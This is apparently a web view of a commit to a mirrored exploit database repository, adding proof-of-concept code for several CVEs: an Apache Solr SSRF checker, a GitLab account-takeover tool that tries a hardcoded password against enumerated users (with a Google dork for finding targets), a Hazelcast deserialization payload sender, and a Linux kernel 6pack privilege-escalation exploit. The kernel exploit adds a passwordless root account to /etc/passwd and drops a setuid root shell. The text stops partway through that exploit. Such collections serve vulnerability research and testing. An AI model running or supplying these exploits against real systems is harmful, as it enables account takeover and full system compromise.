openkylin
/
openkylin-exploit-db
mirror of https://gitee.com/openkylin/openkylin-exploit-db.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity

Merge branch 'master' of gitee.com:openkylin/openkylin-exploit-db into master 

Signed-off-by: 山山而川 <jsy2239111@buaa.edu.cn>
This commit is contained in:
山山而川 2023-03-10 10:04:15 +00:00 committed by Gitee
parent 41db51eb58 c91e9650bb
commit cc60db4607
51 changed files with 20950 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

81
cve/apache-solr/2021/CVE-2021-27905/CVE-2021-27905.py Normal file
View File

@ -0,0 +1,81 @@
# CVE-2021-27905
# Apache solr ssrf
import requests
import urllib3
import json
import sys, getopt
urllib3.disable_warnings()
def title():
print("[-------------------------------------------------------------]")
print("[-------------- Apache Solr SSRF漏洞 ---------------]")
print("[-------- CVE-2021-27905 ----------]")
print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]")
print("[-------- Author:Henry4E36 ------------]")
print("[-------------------------------------------------------------]")
def commit():
url = ""
try:
opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="])
for op, value in opt:
if op == "-h" or op == "--help":
print("""
[-] Apache Solr SSRF漏洞 (CVE-2021-27905)
[-] Options:
-h or --help : 方法说明
-u or --url : 站点URL地址
-d or --dnslog : DnsLog
""")
sys.exit(0)
elif op == "-u" or op == "--url=":
url = value
elif op == "-d" or op == "--dnslog=":
dnslog = value
else:
print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
sys.exit()
return url, dnslog
except Exception as e:
print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")
sys.exit(0)
def target_core(url):
target_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
}
try:
res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)
core = list(json.loads(res.text)["status"])[0]
return core
except Exception as e:
print(f"[!] 目标系统: {url} 出现意外!\n ",e)
def ssrf(core,dnslog):
target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
}
try:
res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
status = json.loads(res.text)["status"]
if res.status_code == 200 and status == "OK":
print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞请检查DNSLog响应\033[0m")
else:
print(f"[0] 目标系统: {url} 不存在SSRF漏洞")
except Exception as e:
print(f"[!] 目标系统: {url} 出现意外!\n ", e)
if __name__ == "__main__":
title()
url ,dnslog = commit()
core = target_core(url)
ssrf(core,dnslog)

18
cve/apache-solr/2021/CVE-2021-27905/README.md Normal file
View File

@ -0,0 +1,18 @@
# Solr-SSRF
Apache Solr SSRF
#Use
Apache Solr 中的 ReplicationHandler通常在 Solr 内核下的 “/replication” 注册)有一个 “masterUrl”也称为 “leaderUrl” 别名)参数,用于指定另一个 Solr 内核上的另一个 ReplicationHandler 将索引数据复制到本地核心中。为了防止SSRF漏洞Solr应该根据它用于“分片”参数的类似配置检查这些参数。在修复此错误之前它没有。此问题基本上会影响在8.8.2中修复之前的所有Solr版本。
[-] Apache Solr SSRF漏洞 (CVE-2021-27905)
[-] Options:
-h or --help : 方法说明
-u or --url : 站点URL地址
-d or --dnslog : DnsLog
# eg
python3 CVE-2021-27905.py -u URL -d dnslog
# reference
code from: https://github.com/Henry4E36/Solr-SSRF

19
cve/apache-solr/2021/yaml/CVE-2021-27905.yaml Normal file
View File

@ -0,0 +1,19 @@
id: CVE-2021-27905
source: https://github.com/Henry4E36/Solr-SSRF
info:
name: Apache Solr是美国阿帕奇Apache基金会的一款基于Lucene一款全文搜索引擎的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
severity: high
description:
Apache Solr 8.8.2之前版本存在代码问题漏洞攻击者可利用masterUrl参数将索引数据复制到本地内核中。
scope-of-influence:
Apache Solr < 8.8.2
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://security.netapp.com/advisory/ntap-20210611-0009/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2021-27905
cnvd-id: CNNVD-202104-914
kve-id: None
tags: cve2021,Apache,Solr,SSRF

21
cve/gitlab/2022/CVE-2022-1162/README.md Normal file
View File

@ -0,0 +1,21 @@
# CVE-2022-1162
A GitLab TakeOver Tool
A simple tool to enumerate users in gitlab and login using CVE-2022-1162
### Google Dork
intitle:"Sign in · GitLab"
_____________
### Cmd
python code.py https://url.com
_____________
Pull Requests are Welcome!

103
cve/gitlab/2022/CVE-2022-1162/code.py Normal file
View File

@ -0,0 +1,103 @@
'''
/$$ /$$
|__/ | $$
/$$ /$$$$$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$
| $$ /$$__ $$ /$$_____/| $$__ $$ /$$__ $$| $$ | $$| $$__ $$ /$$__ $$
| $$| $$ \ $$| $$$$$$ | $$ \ $$| $$ \__/| $$ | $$| $$ \ $$| $$ \ $$
| $$| $$ | $$ \____ $$| $$ | $$| $$ | $$ | $$| $$ | $$| $$ | $$
| $$| $$$$$$$/ /$$$$$$$/| $$$$$$$/| $$ | $$$$$$/| $$ | $$| $$$$$$/
|__/| $$____/ |_______/ |_______/ |__/ \______/ |__/ |__/ \______/
| $$
| $$
|__/
CVE-2022-1162 TAKEOVER TOOL
'''
from bs4 import BeautifulSoup, SoupStrainer
import httplib2
import urllib
import re
import sys
import json
takeoverpassword = '123qweQWE!@#000000000'
http = httplib2.Http()
def get_xrsf(url):
endpoint = url + '/'
keyword = 'authenticity_token'
status, response = http.request(endpoint)
for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('input')):
if link.get('name') and keyword in link.get('name'):
return {'code': str(link.get('value')), 'cookies': str(status['set-cookie'])}
return False
def req(url):
print('Exploring...')
endpoint = url + '/explore'
keyword = 'text-plain'
status, response = http.request(endpoint)
for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')):
if link.get('class') and keyword in link.get('class'):
members(url, link.get('href'))
def members(url, endpoint):
print("Finding members in project: ", endpoint)
endpoint = url +endpoint + '/-/project_members'
status, response = http.request(endpoint)
for link in BeautifulSoup(response.decode(), 'html.parser', parse_only=SoupStrainer('div', {'class': "js-project-members-list-app"})):
users = json.loads(link.get('data-members-data'))["user"]["members"]
for user in users:
user = user["user"]["username"]
print('Member id found:' ,user, 'trying login')
login(url, user, takeoverpassword)
for link in BeautifulSoup(response.decode(), 'html.parser', parse_only=SoupStrainer('div', {'class': "js-project-members-list"})):
users = json.loads(link.get('data-members-data'))["members"]
for user in users:
user = user["user"]["username"]
print('Member id found:' ,user, 'trying login')
login(url, user, takeoverpassword)
for link in BeautifulSoup(response, 'html.parser', parse_only=SoupStrainer('a')):
if link.get('class') and 'js-user-link' in link.get('class'):
user = re.findall("\d+", link.get('href'))[0]
print('Member id found:' ,user, 'trying login')
login(url, user, takeoverpassword)
def login(url, username, password):
url_login = url + '/users/sign_in'
respxrsf = get_xrsf(url)
code = respxrsf["code"]
cookies = respxrsf["cookies"]
data = {
'utf8':'',
'authenticity_token':code,
'user[login]':username,
'user[password]':password,
'user[remember_me]': 0
}
headers = {'Cookie': cookies, 'Content-type': 'application/x-www-form-urlencoded'}
req = http.request(url_login,
method="POST",
headers=headers,
body=urllib.parse.urlencode(data))[1]
if 'invalid login or password' not in req.decode().lower():
print(req.decode())
print(url, username, password, 'pwned!!')
else:
print(url, username, 'wrong')
if __name__ == '__main__':
url = sys.argv[1]
print("Url selected: ", sys.argv[1])
req(url)

22
cve/gitlab/2022/yaml/CVE-2022-1162.yaml Normal file
View File

@ -0,0 +1,22 @@
id: CVE-2022-1162
source: https://github.com/ipsBruno/CVE-2022-1162
info:
name: GitLab是由GitLab Inc.开发一款基于Git的完全集成的软件开发平台。
severity: critical
description: |
GitLab中通过OmniAuth供应商如OAuthLDAPSAML注册的账号设置了硬编码的口令这可能导致攻击者直接接管账号。
scope-of-influence:
14.7 <= GitLabCE/EE< 14.7.7
14.8 <= GitLabCE/EE< 14.8.5
14.9 <= GitLabCE/EE< 14.9.2
reference:
- https://nvd.nist.gov/vuln/detail/cve-2022-1162
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1162
cwe-id: CWE-798
cnvd-id: None
kve-id: None
tags: UseOfHardCodedPassword,cve2022,gitlab

32
cve/hazelcast/2022/CVE-2022-0265/CVE-2022-0265.py Normal file
View File

@ -0,0 +1,32 @@
import socket
import threading
import time
import sys
import os
groupName = b""
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def socketRecv(clientSocket):
global groupName
while(1):
groupName += clientSocket.recv(1024)
if __name__ == '__main__':
ip = sys.argv[1]
payloadType = sys.argv[2]
payload = sys.argv[3]
os.system(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
print(f"java -jar ysoserial.jar {payloadType} {payload} > 1.ser")
clientSocket.connect((ip, 5701))
obj1 = threading.Thread(target=socketRecv ,args=(clientSocket,))
obj1.start()
file = open("1.ser", 'rb')
filebyte = file.read()
print(filebyte)
print("输入 send 发送payload")
if(input("INPUT:")=="send"):
print(groupName)
clientSocket.send(groupName+b"\xFF\xFF\xFF\x9C"+filebyte)
time.sleep(10)
clientSocket.close()

7
cve/hazelcast/2022/CVE-2022-0265/README.md Normal file
View File

@ -0,0 +1,7 @@
# CVE-2022-0265
把 ysoserial.jar 放同目录下
**example** python CVE-2022-0265.py 127.0.0.1 URLDNS "http://xxx.log."
![](poc.png)

BIN
cve/hazelcast/2022/CVE-2022-0265/poc.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 93 KiB

20
cve/hazelcast/2022/yaml/CVE-2022-0265.yaml Normal file
View File

@ -0,0 +1,20 @@
id: CVE-2022-0265
source: https://github.com/achuna33/CVE-2022-0265https://github.com/achuna33/CVE-2022-0265
info:
name: Hazelcast是一个开源的可嵌入式数据网格。Hazelcast使得Java程序员更容易开发分布式计算系统提供了很多Java接口的分布式实现Map, Queue, Topic, ExecutorService, Lock, 以及 JCache等。
severity: critical
description: |
AbstractXmlConfigRootTagRecognizer()函数使用从SAXParserFactory生成的SAXParser该SAXParser没有FEATURE_SECURE_PROCESSING集可能会遭受XXE攻击。
scope-of-influence:
hazelcast 5.1
reference:
- https://nvd.nist.gov/vuln/detail/cve-2022-0265
- https://github.com/hazelcast/hazelcast/commit/4d6b666cd0291abd618c3b95cdbb51aa4208e748
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0265
cwe-id: CWE-611
cnvd-id: None
kve-id: None
tags: cve, xxe

30
cve/linux-kernel/2021/CVE-2021-42008/README.md Normal file
View File

@ -0,0 +1,30 @@
# CVE-2021-42008
## 漏洞描述
drivers/net/hamradio/6pack.c中 decode_data() 函数存在越界写漏洞,用户需具备 CAP_NET_ADMIN 权限。sixpack_decode() 可多次调用 decode_data() ,对输入进行解码并保存到 sixpack->cooked_buf sixpack->rx_count_cooked成员充当访问 sixpack->cooked_buf 的下标确定写入解码字节的目标偏移。问题是如果多次调用decode_data()rx_count_cooked就会一直递增直到超过 cooked_buf 的长度400字节导致越界写。
## 测试环境配置
Linux-v5.13.12 测试环境见`env/`
原exp作者测试环境为 Debian 11 - Kernel 5.10.0-8-amd64如果适配其他版本需修改 sp->cooked_buf 和下一个对象的距离。
编译选项CONFIG_6PACK=y CONFIG_AX25=y
在编译时将.config中的CONFIG_E1000和CONFIG_E1000E变更为=y。
本文exp用到了userfaultfd但5.11版本开始限制了用户对userfaultfd的使用所以需根据 first patch 和 second patch 补丁进行回退去掉SYSCALL_DEFINE1(userfaultfd, int, flags) 函数开头的权限判断语句即可)。
```bash
$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-5.13.12.tar.xz
$ tar -xvf linux-5.13.12.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"。
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录/arch/x86/boot/bzImage。
```
## 保护机制
KASLR / SMEP / SMAP / PTI。开启 CONFIG_SLAB_FREELIST_RANDOM / CONFIG_SLAB_FREELIST_HARDENED / CONFIG_HARDENED_USERCOPY
引用自[bsauce](https://www.jianshu.com/p/d4d2874ed356)

BIN
cve/linux-kernel/2021/CVE-2021-42008/bzImage Normal file
View File

Binary file not shown.

11064
cve/linux-kernel/2021/CVE-2021-42008/config Normal file
View File

File diff suppressed because it is too large Load Diff

789
cve/linux-kernel/2021/CVE-2021-42008/exp.c Normal file
View File

@ -0,0 +1,789 @@
// Exploit is designed and tested for Debian 11, kernel 5.10.0-8-amd64
// gcc -o exploit 6pack_exploit.c -s -lpthread
#define _GNU_SOURCE
#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <pwd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <poll.h>
#include <pthread.h>
#include <linux/userfaultfd.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sched.h>
#include <stdbool.h>
//#define DEBUG 1
#ifdef DEBUG
#define debug_printf(...) printf(__VA_ARGS__)
#else
#define debug_printf(...) do {} while (0)
#endif
#define N_6PACK 7
#define PAGE_SIZE 0x1000
#define LEAK_PAYLOAD_SIZE 576
#define WRITE_PAYLOAD_SIZE 592
#define N_THREADS 8
#define N_MSG 6
#define INIT_IPC_NS 0x5980 // change it !!!!! ffffffff82a25980 D init_ipc_ns
#define init_ipc_ns_offset 0x1a25980 // change it !!!!!
#define modprobe_path_offset 0x186dee0 // change it !!!!! ffffffff810d17e0 T __request_module 0xffffffff8286dee0 <modprobe_path>: "/sbin/modprobe"
static int ufd_qid;
static int qid_A[N_MSG] = {0};
static int qid_B[N_MSG] = {0};
static pthread_t tid[20] = {0};
static int shmid[0x100] = {0};
static void *shmaddr[0x100] = {0};
static int ufd[10] = {0};
static void *pages[] = {
(void *)0x1110000, (void *)0x2220000,
(void *)0x3330000, (void *)0x4440000,
(void *)0x5550000, (void *)0x6660000,
(void *)0x7770000, (void *)0x8880000
};
uint8_t buff[PAGE_SIZE] = {0};
uint8_t buff2[PAGE_SIZE] = {0};
uint64_t init_ipc_ns = 0;
uint64_t modprobe_path = 0;
uint64_t leaked_queue = 0;
int valid_qid = -1;
bool release_pfh = false;
struct pfh_args
{
int id;
int ufd;
void *page;
};
struct t_args
{
int id;
int qid;
void *page;
};
void __pause(char *msg)
{
printf("[-] Paused - %s\n", msg);
getchar();
}
void hexdump(uint8_t *buff, size_t size)
{
int i,j;
for (i = 0; i < size/8; i++)
{
if ((i % 2) == 0)
{
if (i != 0)
printf(" \n");
printf(" %04x ", i*8);
}
printf("0x%016lx", ((uint64_t *)(buff))[i]);
printf(" ");
}
putchar('\n');
}
void print_affinity()
{
cpu_set_t mask;
long ncpu, i;
if (sched_getaffinity(getpid(), sizeof(cpu_set_t), &mask) < 0)
{
perror("[X] sched_getaffinity()");
exit(1);
}
ncpu = sysconf(_SC_NPROCESSORS_ONLN);
puts("[*] CPU affinity:");
for (i = 0; i < ncpu; i++)
printf(" └ Core #%d = %d\n", i, CPU_ISSET(i, &mask));
}
void assign_to_core(int core_id)
{
/*
if (unshare(CLONE_NEWUSER) < 0) {
perror("[-] unshare(CLONE_NEWUSER)");
return -1;
}
if (unshare(CLONE_NEWNET) < 0) {
perror("[-] unshare(CLONE_NEWNET)");
return -1;
}*/
cpu_set_t mask;
pid_t pid;
pid = getpid();
printf("[*] Assigning process %d to core %d\n", pid, core_id);
CPU_ZERO(&mask);
CPU_SET(core_id, &mask);
if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0)
{
perror("[X] sched_setaffinity()");
exit(1);
}
print_affinity();
}
// prepare modprobe file
void prepare_exploit()
{
system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/asd");
system("chmod +x /tmp/asd");
system("echo '#!/bin/sh' > /tmp/x");
system("echo 'chmod +s /bin/su' >> /tmp/x"); // Needed for busybox, just in case
system("echo 'echo \"pwn::0:0:pwn:/root:/bin/sh\" >> /etc/passwd' >> /tmp/x");
system("chmod +x /tmp/x");
memcpy(buff2 + 0xfc8, "/tmp/x\00", 7); // 8+0xfc8 = 0xfd0 to change modprobe_path
}
int setup_modprobe_hax() {
// small ELF file matroshka doll that does;
// fd = open("/tmp/sh", O_WRONLY | O_CREAT | O_TRUNC);
// write(fd, elfcode, elfcode_len)
// chmod("/tmp/sh", 04755)
// close(fd);
// exit(0);
//
// the dropped ELF simply does:
// setuid(0);
// setgid(0);
// execve("/bin/sh", ["/bin/sh", NULL], [NULL]);
unsigned char elfcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,
0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,
0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,
0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,
0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,
0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,
0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,
0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,
0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,
0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,
0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,
0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,
0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,
0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,
0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,
0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00
};
FILE *fp;
system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/asd");
system("chmod +x /tmp/asd");
/*
fp = fopen("/tmp/asd", "wb");
if (fp == NULL) {
perror("fopen");
return -1;
}
if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) {
perror("fwrite");
return -1;
}
fclose(fp);
if (chmod("/tmp/asd", 0777) < 0) {
perror("chmod");
return -1;
}
*/
fp = fopen("/tmp/x", "wb");
if (fp == NULL) {
perror("fopen");
return -1;
}
if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) {
perror("fwrite");
return -1;
}
fclose(fp);
system("chmod +x /tmp/x");
/*
if (chmod("/tmp/x", 0777) < 0) {
perror("chmod");
return -1;
}
*/
memcpy(buff2 + 0xfc8, "/tmp/x\00", 7); // 8+0xfc8 = 0xfd0 to change modprobe_path
return 0;
}
int userfaultfd(int flags)
{
return syscall(SYS_userfaultfd, flags);
}
int initialize_ufd(void *page)
{
int fd;
struct uffdio_register reg;
if ((fd = userfaultfd(O_NONBLOCK)) == -1)
{
perror("[X] Userfaultfd failed");
exit(1);
}
if ((ufd_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("[X] msgget");
exit(1);
}
struct uffdio_api api = { .api = UFFD_API };
if (ioctl(fd, UFFDIO_API, &api))
{
perror("[X] ioctl - UFFDIO_API failed");
exit(1);
}
if (api.api != UFFD_API)
{
puts("[X] Unexpected UFFD api version!");
exit(1);
}
debug_printf("[*] Start monitoring range: %p - %p\n", page + PAGE_SIZE, page + PAGE_SIZE*2);
reg.mode = UFFDIO_REGISTER_MODE_MISSING;
reg.range.start = (long)(page + PAGE_SIZE);
reg.range.len = PAGE_SIZE;
if (ioctl(fd, UFFDIO_REGISTER, &reg))
{
perror("[X] ioctl - UFFDIO_REGISTER failed");
exit(1);
}
return fd;
}
// page_fault_handler() —— copy fake modprobe_path string to faultpage
void *page_fault_handler(void *arg)
{
struct pollfd pollfd;
struct uffd_msg fault_msg;
struct uffdio_copy ufd_copy;
struct uffdio_range ufd_range;
pid_t pid;
int ufd = ((struct pfh_args *)arg)->ufd;
int id = ((struct pfh_args *)arg)->id + 1;
void *page = ((struct pfh_args *)arg)->page;
pollfd.fd = ufd;
pollfd.events = POLLIN;
debug_printf("[PFH %d] Started!\n", id);
while (poll(&pollfd, 1, -1) > 0)
{
if ((pollfd.revents & POLLERR) || (pollfd.revents & POLLHUP))
{
perror("[X] Polling failed");
exit(1);
}
if (read(ufd, &fault_msg, sizeof(fault_msg)) != sizeof(fault_msg))
{
perror("[X] Read - fault_msg failed");
exit(1);
}
char *page_fault_location = (char *)fault_msg.arg.pagefault.address;
if (fault_msg.event != UFFD_EVENT_PAGEFAULT)
{
perror("[X] Unexpected pagefault?");
exit(1);
}
if (page_fault_location == page + PAGE_SIZE)
{
debug_printf("[PFH %d] Page fault at 0x%lx\n", id, page_fault_location);
for (;;)
{
if (!release_pfh)
continue;
debug_printf("[PFH %d] Releasing faulting thread\n", id);
ufd_copy.dst = (uint64_t)(page_fault_location);
ufd_copy.src = (uint64_t)(&buff2); // copy buff2 to the fault_page, buff2 contains fake modprobe_path string, to change modeprobe_path
ufd_copy.len = PAGE_SIZE;
ufd_copy.mode = 0;
ufd_copy.copy = 0;
if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
{
perror("[X] ioctl(UFFDIO_COPY)");
exit(1);
}
break;
}
debug_printf("[PFH %d] Faulting thread released\n", id);
break;
}
}
}
// create faultpage handler
void create_pfh_thread(int id, int ufd, void *page)
{
struct pfh_args *args = (struct pfh_args *)malloc(sizeof(struct pfh_args));
args->id = id;
args->ufd = ufd;
args->page = page;
pthread_create(&tid[id], NULL, page_fault_handler, (void *)args);
}
// alloc_shm() —— spray 100 shm_file_data in kmalloc-32
void alloc_shm(int i)
{
shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);
if (shmid[i] < 0)
{
perror("[X] shmget fail");
exit(1);
}
shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);
if (shmaddr[i] < 0)
{
perror("[X] shmat");
exit(1);
}
}
void destroy_shm(int i)
{
shmdt(shmaddr[i]);
shmctl(shmid[i], IPC_RMID, NULL);
}
void alloc_msg_queue_A(int id)
{
if ((qid_A[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("[X] msgget");
exit(1);
}
}
// spray 6 msg_msg in kmalloc-4k and 6 msg_msgseg in kmalloc-32
void send_msg(int qid, int size, int type, int c)
{
struct msgbuf
{
long mtype;
char mtext[size];
} msg;
msg.mtype = type;
memset(msg.mtext, c, sizeof(msg.mtext));
if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
{
perror("[X] msgsnd");
exit(1);
}
}
void *recv_msg(int qid, size_t size, int type)
{
void *memdump = malloc(size);
if (msgrcv(qid, memdump, size, type, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) < 0)
{
perror("[X] msgrcv");
return NULL;
}
return memdump;
}
int open_ptmx(void)
{
int ptmx;
ptmx = getpt();
if (ptmx < 0)
{
perror("[X] open_ptmx()");
exit(1);
}
grantpt(ptmx);
unlockpt(ptmx);
return ptmx;
}
int open_pts(int fd)
{
int pts;
pts = open(ptsname(fd), 0, 0);
if (pts < 0)
{
perror("[X] open_pts()");
exit(1);
}
return pts;
}
void set_line_discipline(int fd, int ldisc)
{
if (ioctl(fd, TIOCSETD, &ldisc) < 0)
{
perror("[X] ioctl() TIOCSETD");
exit(1);
}
}
int init_sixpack()
{
int ptmx, pts;
ptmx = open_ptmx();
pts = open_pts(ptmx);
set_line_discipline(pts, N_6PACK);
return ptmx;
}
uint8_t *sixpack_encode(uint8_t *src)
{
uint8_t *dest = (uint8_t *)calloc(1, 0x3000);
uint32_t raw_count = 2;
for (int count = 0; count <= PAGE_SIZE; count++)
{
if ((count % 3) == 0)
{
dest[raw_count++] = (src[count] & 0x3f);
dest[raw_count] = ((src[count] >> 2) & 0x30);
}
else if ((count % 3) == 1)
{
dest[raw_count++] |= (src[count] & 0x0f);
dest[raw_count] = ((src[count] >> 2) & 0x3c);
}
else
{
dest[raw_count++] |= (src[count] & 0x03);
dest[raw_count++] = (src[count] >> 2);
}
}
return dest;
}
// generate_payload() —— construct payload and encode it
uint8_t *generate_payload(uint64_t target)
{
uint8_t *encoded;
memset(buff, 0, PAGE_SIZE);
// sp->rx_count_cooked = 0x696
buff[0x194] = 0x90;
buff[0x19a] = 0x06;
// fix upper two bytes of msg_msg.m_list.prev
buff[0x19b] = 0xff;
buff[0x19c] = 0xff;
// msg_msg.m_ts = 0x1100 0x19c + 0x8(long m_type) + 2 = 0x1a6
buff[0x1a6] = 0x11;
// msg_msg.next = target
if (target)
{
for (int i = 0; i < sizeof(uint64_t); i++)
buff[0x1ad + i] = (target >> (8 * i)) & 0xff;
}
encoded = sixpack_encode(buff);
// sp->status = 0x18 (to reach decode_data())
encoded[0] = 0x88;
encoded[1] = 0x98;
return encoded;
}
int find_message_queue(uint16_t tag)
{
switch (tag)
{
case 0x4141: return 0;
case 0x4242: return 1;
case 0x4343: return 2;
case 0x4444: return 3;
case 0x4545: return 4;
case 0x4646: return 5;
default: return -1;
}
}
// leak init_ipc_ns address and calculate modprobe_path address
void leak_pointer(void)
{
uint64_t *leak;
for (int id = 0; id < N_MSG; id ++)
{
leak = (uint64_t *)recv_msg(qid_A[id], 0x1100, 0);
if (leak == NULL)
continue;
for (int i = 0; i < 0x220; i++)
{
if ((leak[i] & 0xffff) == INIT_IPC_NS)
{
init_ipc_ns = leak[i];
valid_qid = find_message_queue((uint16_t)leak[1]);
modprobe_path = init_ipc_ns - init_ipc_ns_offset + modprobe_path_offset;
return;
}
}
}
}
void alloc_msg_queue_B(int id)
{
if ((qid_B[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
perror("[X] msgget");
exit(1);
}
}
void *allocate_msg(void *arg)
{
